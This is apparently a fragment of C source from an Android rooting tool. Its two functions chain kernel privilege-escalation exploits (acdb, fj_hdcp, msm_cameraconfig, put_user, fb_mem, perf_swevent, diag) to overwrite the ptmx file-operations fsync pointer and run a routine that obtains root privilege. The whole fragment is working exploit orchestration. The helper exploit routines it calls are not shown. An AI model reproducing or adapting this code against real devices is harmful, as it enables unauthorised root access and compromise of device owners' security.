static bool
run_exploit(void)
{
unsigned long int ptmx_fsync_address;
unsigned long int ptmx_fops_address;
ptmx_fops_address = get_ptmx_fops_address();
if (!ptmx_fops_address) {
return false;
}
ptmx_fsync_address = ptmx_fops_address + 0x38;
if (attempt_diag_exploit(ptmx_fsync_address)) {
return true;
}
printf("\n");
printf("Attempt acdb exploit...\n");
if (attempt_acdb_exploit(ptmx_fsync_address, 0)) {
return true;
}
printf("\n");
printf("Attempt perf_swevent exploit...\n");
return perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege,
run_obtain_root_privilege, NULL);
}
bool
attempt_exploit(unsigned long int address,
unsigned long int write_value,
unsigned long int restore_value,
exploit_callback_t callback_func,
void *callback_param)
{
callback_info_t info;
info.func = callback_func;
info.param = callback_param;
info.result = false;
// Attempt exploits in most stable order
printf("Attempt acdb exploit...\n");
if (attempt_acdb_exploit(address, write_value, restore_value, &info)) {
return info.result;
}
printf("\n");
printf("Attempt fj_hdcp exploit...\n");
if (attempt_fj_hdcp_exploit(address, write_value, restore_value, &info)) {
return info.result;
}
printf("\n");
printf("Attempt msm_cameraconfig exploit...\n");
if (attempt_msm_cameraconfig_exploit(address, write_value, restore_value, &info)) {
return info.result;
}
printf("\n");
printf("Attempt put_user exploit...\n");
if (attempt_put_user_exploit(address, write_value, restore_value, &info)) {
return info.result;
}
printf("\n");
printf("Attempt fb_mem exploit...\n");
if (attempt_fb_mem_exploit(address, write_value, restore_value, &info)) {
return info.result;
}
printf("\n");
printf("Attempt perf_swevent exploit...\n");
if (perf_swevent_run_exploit(address, write_value, &run_callback, &info)) {
return info.result;
}
printf("\n");
if (attempt_diag_exploit(address, write_value, &info)) {
return info.result;
}
return false;
}
